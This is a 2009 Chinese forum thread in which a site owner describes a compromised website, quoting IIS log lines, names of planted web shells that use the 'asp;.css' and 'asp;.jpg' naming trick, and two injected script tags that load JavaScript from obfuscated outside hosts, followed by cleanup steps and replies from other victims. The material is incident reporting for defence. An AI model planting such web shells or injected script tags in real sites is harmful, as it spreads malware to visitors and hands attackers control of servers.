网站被挂马的进来看看.是不是都有这样的情况?

chentaonc · 发表于 2009-8-24 22:39:30

本帖最后由 chentaonc 于 2009-8-25 12:55 编辑

编辑中!马上上图晕死不可以上附件~

日志有下列动作:80 POST HTTP/1.1 200 0 171 275 291 0 /css/default.asp;.css - -
80 POST HTTP/1.1 200 0 234 275 319 0 /fckeditor/editor/skins/silver/images/inedx.asp - -
80 POST HTTP/1.1 200 0 218 275 329 0 /fckeditor/editor/dialog/fck_spellerpages/bottum.asp - -
80 POST HTTP/1.1 200 0 187 275 325 0 /fckeditor/editor/plugins/dragresizetable/C00N.asp - -
80 POST HTTP/1.1 200 0 187 275 279 0 /admina/Images/help.asp;.jpg - -
80 GET HTTP/1.1 200 0 156 4274 63 0 /admina/admin_login.asp t=3358 -
80 POST HTTP/1.1 200 0 2421 4671 10841 0 /css/default.asp;.css - -index.asp 被修改
Css/ 文件夹中有个 default.asp;.css

后台 Images/ 文件夹中 help.asp;.jpg

HTML文件中多了 <script id="seraph3script2399" type="text/javascript" src="http://0%3810.6600.org" language="JavaScript"  ></script>
<script language="JavaScript" type="text/javascript" id="seraph4script9195" src="http://c0812%2E2288%2Eorg"  ></script>

后台INC文件夹 Admin.js  js.js 被修改

后台Info/ 文件夹 index.asp被修改

/Templates/文件夹全部html修改

/Person/文件夹 index.asp 修改

plus/photo/ 文件夹 html修改

/photo/images/  xingxiangcat.js修改

/Sideline/  index.asp 修改

/Inc/ Keyboard.js 修改

/Js/  全部.js修改

/Member/ index.asp top.asp修改

/Onlinepay/chinabank/  index.asp
/Onlinepay/ index.asp

/fckeditor/editor/plugins/dragresizetable/ 多了CONN.ASP文件

/fckeditor/editor/skins/silver/images/ 多了index.asp 文件

/fckeditor/editor/dialog/fck_spellerpages/  多了 bottum.asp文件

/Count/  stat.js文件

/Company/ index.asp文件

Besthr/  index.asp

Autohtml/ index.asp

Article/ index.asp

其他地方我继续检查~\

暂时解决办法: 修改所有被修改代码!
               关闭空间除Upfiles 目录的写入权限
               关闭 Upfiles 目录的执行权限
               数据库转移到其他地方.不要在WEB同一目录下!
               修改管理员密码. 修改后台地址

IIS日志要明天才可以生成.明天让管理员看看~~~  哎

admin · 发表于 2009-8-24 23:41:00

你这里列的比较详细，具体解决办法
http://bbs.yjys.net/thread-21338-1-1.html

chentaonc · 发表于 2009-8-25 00:07:34

希望出补丁

guanqirui · 发表于 2009-8-25 08:25:55

昨天和今天连续两天被挂马，流量受很大影响

lpy424 · 发表于 2009-8-25 08:36:38

怎么回事？我的站也被挂马。和楼主的一样的马！~~
希望出补丁！！！及时解决~~~~~~~

xxx9956 · 发表于 2009-8-25 09:41:49

按照这个一个一个解决吧，哎！
黑客气死我了！
揪住黑客要往死里打！

水山小村 · 发表于 2009-8-25 10:06:05

就是

eivac · 发表于 2009-8-25 10:34:49

我的也被挂了嘉缘的安全怎么一直做不好啊

shuisheng · 发表于 2009-8-25 12:39:57

我的也是昨天被挂木马了，
郁闷死啊，，，
怎么都被挂木马了，

jeangone · 发表于 2009-8-26 22:26:50

是这样啊，吓死我了，我弄了好几次。

账号		自动登录	找回密码
密码			注册会员

[其他信息] 网站被挂马的进来看看.是不是都有这样的情况?

浏览过的版块

社区居民

新人进步